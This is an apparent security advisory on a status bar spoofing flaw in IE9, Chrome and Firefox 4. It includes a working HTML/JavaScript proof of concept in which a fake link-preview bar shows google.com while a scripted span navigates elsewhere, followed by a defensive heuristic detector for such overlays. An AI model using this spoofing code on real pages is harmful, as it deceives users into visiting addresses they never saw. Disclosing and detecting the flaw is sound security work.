IE & Chrome & Firefox Status Bar Spoofing Vulnerability


Via: XeyeTeam


# [+] Exploit Title: IE & Chrome & Firefox Status Bar Spoofing Vulnerability
# [+] Time: 1742011
# [+] Author: xisigr
# [+] Version: IE9.0 & Chrome all version & Firefox4.0
# [+] Tested On: WIN 7
# [+] CVE: N/A

This vulnerability exists in all Google Chrome versions, Firefox 4.0 and IE 9.0. None of these browsers has a fixed status bar: the status bar appears only when the mouse hovers over a link, and it then displays that link's URL. This design leaves room for a logic flaw. The attacker scripts a clickable control (in the demo below, a <span> with an onclick handler rather than an <a href>, so the browser never shows its own link preview) and, when the mouse moves over it, uses images or text to draw a fake status bar in exactly the place where the real one would appear. That is the spoof: when the user clicks the control, the navigation target is not the address shown in the fake status bar but a malicious address the user never saw. This differs from traditional status bar spoofing (overwriting window.status, or swapping the href in an onmousedown handler): here the browser's real status bar is not manipulated at all; the attacker simply imitates a fixed browser UI module with HTML, and wherever that is possible, spoofing follows. Thanks to hysia and evilcos for discussing optimization of the POC.

Demo code:


<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
<title>Status Bar Spoofing Vulnerability</title>
<style>
/* Each class imitates the native link-preview bar of one browser and is
   positioned where that browser draws it (bottom-left corner of the viewport). */
.firefox4 {
  background: -moz-linear-gradient(top, #fefefe, #dddddd);
  width: 250px;
  height: 20px;
  border: solid 1px #cccccc;
  -moz-border-radius-topright: 3px;
  font-size: 12px;
  font-family: "";
  color: #333333;
  line-height: 20px;
  padding: 0px 0px 0px 5px;
  position: absolute;
  bottom: 0px; left: 0px;
  display: none;
}
.chrome {
  background: #DFDFDF;
  width: 250px;
  height: 23px;
  -webkit-border-top-right-radius: 4px;
  font-size: 12px;
  font-family: "";
  color: #333333;
  line-height: 23px;
  padding: 0px 0px 0px 3px;
  position: absolute;
  bottom: 0px; left: 0px;
  display: none;
}
.ie9 {
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#FFFFFF, endColorstr=#E4E5F0, GradientType=0);
  width: 250px;
  height: 20px;
  border: solid 1px #767676;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
  box-shadow: 2px 2px 4px #8E8E8E;
  font-size: 12px;
  font-family: "";
  color: #575757;
  line-height: 20px;
  padding: 0px 0px 0px 5px;
  position: absolute;
  bottom: 4px; left: 4px;
  display: none;
}
/* The "link" is not an <a>; it only looks like one. */
.link {
  color: blue;
  text-decoration: underline;
  cursor: pointer;
}
</style>
<script>
var Sys = {};
var ua = navigator.userAgent.toLowerCase();
var s;
// Detect the browser from the User-Agent so the fake bar can copy its native look.
(s = ua.match(/msie ([\d.]+)/)) ? Sys.ie = s[1] :
(s = ua.match(/firefox\/([\d.]+)/)) ? Sys.firefox = s[1] :
(s = ua.match(/chrome\/([\d.]+)/)) ? Sys.chrome = s[1] :
(s = ua.match(/opera.([\d.]+)/)) ? Sys.opera = s[1] :
(s = ua.match(/version\/([\d.]+).*safari/)) ? Sys.safari = s[1] : 0;

// Give the hidden div the CSS class matching the detected browser.
// No .opera / .safari styles are defined above, so the fake bar stays unstyled there.
function setClass() {
  if (Sys.ie) document.getElementById("statusbar").className = "ie9";
  if (Sys.firefox) document.getElementById("statusbar").className = "firefox4";
  if (Sys.chrome) document.getElementById("statusbar").className = "chrome";
  if (Sys.opera) document.getElementById("statusbar").className = "opera";
  if (Sys.safari) document.getElementById("statusbar").className = "safari";
}

function showBrowser() {
  if (Sys.ie) document.write("IE: " + Sys.ie);
  if (Sys.firefox) document.write("Firefox: " + Sys.firefox);
  if (Sys.chrome) document.write("Chrome: " + Sys.chrome);
  if (Sys.opera) document.write("Opera: " + Sys.opera);
  if (Sys.safari) document.write("Safari: " + Sys.safari);
}

// Toggle the fake status bar ("block" on hover, "none" when the mouse leaves).
function show(status) {
  document.getElementById("statusbar").style.display = status;
}

// The real destination, never shown to the user.
function goto(url) {
  location = url;
}
</script>
</head>
<body onload="setClass();">
<!-- A span with onclick, not <a href>: the browser shows no link preview of its own,
     so the only "status bar" the user sees is the div faked below. -->
<div id="info">Your browser is <script>showBrowser()</script>, try a <span class="link" onmouseover="show('block');" onmouseout="show('none');" onclick="goto('http://xeyeteam.appspot.com/');">DEMO</span></div>

<div id="statusbar" class="">http://www.google.com...</div>
</body>
</html>
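The demo shows what the user sees; what a defender can check for is the signature the advisory describes: an element taken out of normal flow, pinned to the bottom-left corner where these browsers draw their link preview, hidden until hover, showing URL-like text, while the clickable control is a non-anchor that navigates from script to a different host. The following heuristic is an added example written for this page, not code from the advisory or from XeyeTeam. In a browser content script the element list would be built from document.querySelectorAll('*') and getComputedStyle(); here the elements, the script text and the page object (DEMO_PAGE, mirroring the demo above) are constructed by hand so the logic runs offline in Node. All names (hostsIn, looksLikeFakeStatusBar, isScriptedLink, analyzeStatusBarSpoof) are this example's own.

```javascript
// Added example: heuristic detector for fake status-bar overlays of the kind
// shown in the demo above. Element descriptors are plain objects
// ({tag, id, text, attrs, style}) so the code runs in Node without a DOM.

const URL_RE = /(?:https?:\/\/|www\.)[^\s<>"']+/gi;

// Extract URL-like strings from free text and return their host names, lower-cased.
// Trailing punctuation is stripped because the demo's fake bar ends in "...".
function hostsIn(text) {
  const hosts = new Set();
  for (const raw of (text || '').match(URL_RE) || []) {
    const cleaned = raw.replace(/[.,;)\]]+$/, '');
    try {
      const abs = cleaned.startsWith('www.') ? 'http://' + cleaned : cleaned;
      hosts.add(new URL(abs).hostname.toLowerCase());
    } catch (e) {
      // not a parseable URL; ignore
    }
  }
  return hosts;
}

// Candidate fake status bar: out of normal flow, pinned within 10px of the
// bottom-left corner (where Firefox 4, Chrome and IE 9 draw the real link
// preview), hidden by default, and displaying URL-like text.
function looksLikeFakeStatusBar(el) {
  const st = el.style || {};
  const outOfFlow = st.position === 'absolute' || st.position === 'fixed';
  const pinned = parseFloat(st.bottom) <= 10 && parseFloat(st.left) <= 10;
  return outOfFlow && pinned && st.display === 'none' && hostsIn(el.text).size > 0;
}

// Scripted "link": a non-anchor with both a click handler and a hover handler.
// A real <a href> would let the browser show its own preview; this cannot.
function isScriptedLink(el) {
  const a = el.attrs || {};
  return el.tag !== 'a' && !!a.onclick && !!(a.onmouseover || a.onmouseenter);
}

// For every candidate overlay, compare the host it displays with the hosts that
// occur in the page's scripts and in the scripted links' inline handlers. A
// displayed host that appears nowhere in that navigation code is the spoof.
function analyzeStatusBarSpoof(page) {
  const scripted = page.elements.filter(isScriptedLink);
  const navigationCode = [
    ...page.scripts,
    ...scripted.flatMap(el => Object.values(el.attrs || {})),
  ].join('\n');
  const realHosts = hostsIn(navigationCode);
  return page.elements.filter(looksLikeFakeStatusBar).map(el => {
    const shown = [...hostsIn(el.text)];
    return {
      overlay: el.id || el.tag,
      shownHosts: shown,
      realHosts: [...realHosts],
      scriptedLinks: scripted.map(s => s.id || s.tag),
      mismatch: shown.some(h => !realHosts.has(h)),
    };
  });
}

// Constructed sample page mirroring the demo above (not a live DOM).
const DEMO_PAGE = {
  scripts: [
    'function show(s){document.getElementById("statusbar").style.display=s;}',
    'function goto(url){location=url;}',
  ],
  elements: [
    { tag: 'span', id: 'demo-link', text: 'DEMO',
      attrs: { onmouseover: "show('block');", onmouseout: "show('none');",
               onclick: "goto('http://xeyeteam.appspot.com/');" } },
    { tag: 'div', id: 'statusbar', text: 'http://www.google.com...',
      style: { position: 'absolute', bottom: '0px', left: '0px', display: 'none' } },
    // Benign elements for contrast: a real anchor and a hidden footer without a URL.
    { tag: 'a', id: 'real-link', text: 'Home', attrs: { href: 'http://www.google.com/' } },
    { tag: 'div', id: 'footer', text: 'Footer',
      style: { position: 'absolute', bottom: '0px', left: '0px', display: 'none' } },
  ],
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(analyzeStatusBarSpoof(DEMO_PAGE), null, 2));
}
```

Run against DEMO_PAGE, the analysis reports one overlay (statusbar) showing www.google.com while the only host reachable from the scripted link is xeyeteam.appspot.com, so mismatch is true; change the overlay text to the real destination and it is false. The heuristic is a user-side aid only (it will also flag legitimate sticky footers that happen to contain a URL); the durable fix belongs in the browser UI, which is the point of the advisory.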
